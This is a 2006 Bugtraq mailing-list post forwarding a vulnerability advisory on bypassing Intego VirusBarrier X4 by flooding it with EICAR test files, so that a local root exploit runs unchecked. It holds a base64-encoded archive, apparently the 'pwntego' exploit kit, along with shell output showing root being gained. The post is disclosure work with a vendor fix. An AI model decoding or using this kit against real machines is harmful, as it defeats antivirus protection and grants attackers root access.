[<prev] [next>] [day] [month] [year] [list]
Message-ID: <455A0BBD.8020200@digitalmunition.com>
Date: Tue, 14 Nov 2006 13:32:29 -0500
From: "K F (lists)" <kf_lists@...italmunition.com>
To: bugtraq@...urityfocus.com
Subject: [Fwd: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass
exploit']
I think the list spam trap ate this message a few weeks ago.
Message-ID: <45528089.9070802@...italmunition.com>
Date: Wed, 08 Nov 2006 20:12:41 -0500
From: "K F (lists)" <kf_lists@...italmunition.com>
User-Agent: Thunderbird 1.5.0.7 (Macintosh/20060909)
MIME-Version: 1.0
To: bugtraq@...urityfocus.com
Subject: DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Content-Type: multipart/mixed;
boundary="------------070901050709080407020707"
This is a multi-part message in MIME format.
--------------070901050709080407020707
Content-Type: text/plain; charset=ISO-8859-1; format=flowed
Content-Transfer-Encoding: 7bit
This was supposed to go out on Halloween but it didn't... but either way
all you Mac users can get scared or something. OOGA BOOGA!
--------------070901050709080407020707
Content-Type: application/x-gzip; x-mac-type="477A6970"; x-mac-creator="53495478";
name="pwntego.tar.gz"
Content-Transfer-Encoding: base64
Content-Disposition: inline;
filename="pwntego.tar.gz"
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
--------------070901050709080407020707
Content-Type: text/plain; x-mac-type="54455854"; x-mac-creator="74747874";
name="DMA[2006-1031a].txt"
Content-Transfer-Encoding: 7bit
Content-Disposition: inline;
filename="DMA[2006-1031a].txt"
DMA[2006-1031a] - 'Intego VirusBarrier X4 definition bypass exploit'
Author: Kevin Finisterre
Vendor(s): http://www.intego.com
Product: 'Intego VirusBarrier X4 <= VirusBarrierX47070.dmg'
References:
http://www.digitalmunition.com/DMA[2006-1031a].txt
Description:
Intego VirusBarrier X4 is the simple, fast and non-intrusive antivirus security solution for Macintosh computers, by Intego, the
leading publisher of personal security software for Macintosh. It offers thorough protection against viruses of all types, coming
from infected files or applications, whether on CD-ROMs, DVDs or other removable media, or on files downloaded over the Internet
or other types of networks.
Intego VirusBarrier X4 protects your computer from viruses by constantly examining all the files that your computer opens and
writes, as well as watching for suspicious activity that may be the sign of viruses acting on applications or other files. With
Intego VirusBarrier X4 on your computer, you can rest assured that your Macintosh has the best protection available against
viruses of all kinds.
Although VirusBarrier does a pretty good job of halting malicous activity the product currently suffers from a flaw related to the
amount of alerts that it can process simultaneously. If an attacker is able to trigger multiple alerts in succession within a very
short amount of time he or she may be able cause VirusBarrier to completely ignore positive matches against virus definitions. The
consequences of ignored matches may include full system compromise or further spreading of malware.
As an example we will show how VirusBarrier normally stops a local root exploit with behavior similar to 'OSX.ExploitMachex.A', then
we will demonstrate how the VirusBarrier protection can be bypassed by using a simple flood of Eicar Test files.
Any typical attempt to access or execute a file or program that is a match for a VirusBarrier definition results in an alert on the
user interface. There is a sweet lookin insulin bottle on the screen that slowly empties as the virus nears eradication.
'excploit' is infected by 'OSX.ExploitMachex.A' What would you like to do ('Ignore' || 'Repair')?
Selecting 'Ignore' allows the malicious code to execute as if no AntiVirus program existed at all.
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
uid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
On the other hand if you chose 'Repair' the process is terminated dead in its tracks and the file is nulled out:
virusbarrier-users-ibook:/tmp virusbarrieruser$ ./excploit
-bash: ./excploit: Operation not permitted
virusbarrier-users-ibook:/tmp virusbarrieruser$ ls -al excploit
-rwxr-xr-x 1 virusbar wheel 0 Oct 31 02:02 excploit
The above output demonstrates how Virusbarrier is supposed to work. Under normal circumstances this would be adequate to stop a
malicious attack.
If however an attacker floods the file system with dummy virus files at a quick rate the VirusBarrier software will promptly stop
responding after presenting the user with a few audible and visual alerts. After about 40 some odd infected files in a row the
system will become confused and in some cases VirusBarrier may stop responding completely. (Intego confirmed a limit of 20 files)
When under attack the user may see dozens of messages on the screen. With our example code the messages are similar to the following:
'0.92815455662033' is infected by 'EICAR Test' What would you like to do ?
>>From the attackers standpoint the exploitation is fairly quick and simple. Our example uses a local root exploit however this tactic
could easily be applied to any existing malware technique that Intego VirusBarrier protects against. Code could in theory be run as a
precurser to an InqTana attack as a means to bypass the Intego protection. The existing signatures for InqTana A B C and D would
then be completely useless and an E variant would be born.
virusbarrier-users-ibook:~ virusbarrieruser$ cd ~/Desktop/pwntego
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ls
Pwntego.pl Pwntego.sh README.txt pwntego.uu rand-eicar.pl
virusbarrier-users-ibook:~/Desktop/pwntego virusbarrieruser$ ./Pwntego.pl
rm: /tmp/objc_sharing_ppc_92: Permission denied
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P
;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p;p;P;p;p
Injecting pwnacillin shot
;p;P;p;p;p;P;p;p;p;P;p;puid=0(root) gid=0(wheel) groups=0(wheel), 81(appserveradm), 79(appserverusr), 80(admin)
rm: /tmp/objc_sharing_ppc_92: Permission denied
In the above example 'OSX.ExploitMachex.A' is being executed on a machine that is actively protected by VirusBarrier. In a matter of
seconds the Intego engine is flooded and the attacker has the ability to completely ignore any Intego virus and malware definitions.
One fun side effect of this attack is that the user must manually ignore a number of alerts. The users is either forced to Wait for
each alert to timeout on its own after several seconds or respond individually to each one.
This attack has a fairly obvious signature in syslog if the attacker is making use of the example code provided in this text.
Obviousyly using random viruses and better random locations and names is a possible vactor for a crafty attacker.
virusbarrier-users-ibook:/var/log root# tail -n 30 /var/log/vbmgvx.log
Tue Oct 31 02:01:59 2006 - File infected: /private/tmp/excploit by OSX.ExploitMachex.A
Tue Oct 31 02:03:35 2006 - File infected: /private/tmp/0.928154556620033 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.61298609695314 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.162308515588851 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.0414842034961147 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.170612903152691 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.663680631042556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.989461917736666 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.141391639438556 by EICAR Test
Tue Oct 31 02:03:36 2006 - File infected: /private/tmp/0.767640548831881 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.33160483146003 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.905278172650473 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.694262116056965 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.659224330986948 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.0702005096982283 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.708270066600888 by EICAR Test
Tue Oct 31 02:03:37 2006 - File infected: /private/tmp/0.59629Vixen08698 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56121Nixen47099 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.56036Rocks!6377 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.184830066600818 by EICAR Test
Tue Oct 31 02:03:38 2006 - File infected: /private/tmp/0.783363853189261 by EICAR Test
With the current fixes in place once VirusBarrier gets 19 alerts, the next malware is simply quarantined until the administrator can
repair them. In our example, the additional processes get a permission error when they are executed.
Of course since everyone knows there is no malware for Macintosh this scenario would quite simply never be encountered..... *smirk*
The Intego staff was more than helpful and willing to address this issue in a timely fashion. After communications were established
this problem was addressed, and fixes were out the door to customers in a matter of 2 days. How about that for turn around time!
Workaround:
Please update to the latest version of Intego Virus Barrier and the latest Vdefs.
http://www.intego.com/services/updates.asp?product=VirusBarrier
Intego has fixed this bug in the 2006/11/01 Vdef files.
--------------070901050709080407020707--
Powered by blists - more mailing lists